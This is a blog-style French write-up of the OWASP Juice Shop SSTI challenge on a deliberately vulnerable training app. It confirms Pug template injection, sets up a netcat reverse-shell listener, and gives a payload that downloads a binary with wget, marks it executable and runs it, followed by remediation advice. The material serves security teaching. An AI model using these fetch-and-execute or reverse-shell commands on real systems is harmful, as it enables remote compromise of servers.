Server-Side Template Injection (SSTI) : Owasp Juice Shop
Challenge : SSTI
Server-Side Template Injection (SSTI) : Owasp Juice Shop
Challenge : SSTI
Infectez le serveur avec un malware juteux en abusant de l’exécution arbitraire de commandes.
Analyse
Une Server-Side Template Injection (SSTI) est une vulnérabilité qui permet à un attaquant d’injecter du code dans un moteur de template côté serveur, pouvant potentiellement conduire à une Remote Code Execution (RCE).
Après avoir consulté le dépôt GitHub, nous pouvons identifier le moteur de template utilisé : Pug.

Pug
Pour confirmer la vulnérabilité, nous pouvons nous référer à cette ressource :

77*
Pour tester, nous injectons #{7*7} dans un champ de saisie. Si la multiplication est évaluée et que nous obtenons le résultat 49, cela confirme la vulnérabilité SSTI.
Exploitation :
- Remote code exécution
Cette vulnérabilité nous permet d’exécuter des commandes arbitraires sur le serveur. En premier lieu, nous allons chercher à obtenir un reverse shell.
Tout d’abord, nous lançons un listeneur netcat sur le port 4444.
nc -lnvp 4444
Nous pouvons maintenant remplir le champ username avec notre payload :


RCE
Avec la commande whoami, nous remarquons que nous sommes l’utilisateur _juice.
- Résolution du challenge
Pour rappel, nous devons exécuter le malware juicy sur le serveur.
Pour savoir ce qu’il fait, nous allons l’exécuter sur une VM dédiée.

Il attend une liaison sur localhost:3000.
Un listeneur est donc mis en écoute sur le port 3000.
Nous pouvons utiliser ce payload dans le champ utilisateur pour télécharger le malware, changer ses droits, et l’exécuter :

wget -O /tmp/malware https://github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_amd_64?raw=true && chmod +x /tmp/malware && /tmp/malware

nc
En allant à cet endpoint, le challenge est résolu.
Remédiations :
- Désactiver l’exécution de code arbitraire dans les templates côté serveur.
- Sanitiser toutes les entrées utilisateurs avant de les passer au moteur de template.
- Limiter les permissions des utilisateurs applicatifs pour réduire l’impact d’une RCE.
- Surveiller et filtrer les téléchargements et exécutions de fichiers externes.
메타데이터
- post_id
- 5dd2c3b8b009
- slug
- server-side-template-injection-ssti-owasp-juice-shop-5dd2c3b8b009
- url
- https://medium.com/@4th3n4x/server-side-template-injection-ssti-owasp-juice-shop-5dd2c3b8b009
- canonical_url
- https://medium.com/@4th3n4x/server-side-template-injection-ssti-owasp-juice-shop-5dd2c3b8b009
- author_url
- https://medium.com/@4th3n4x
- status
- ok
- fetched_at
- 2026-06-16 19:09:56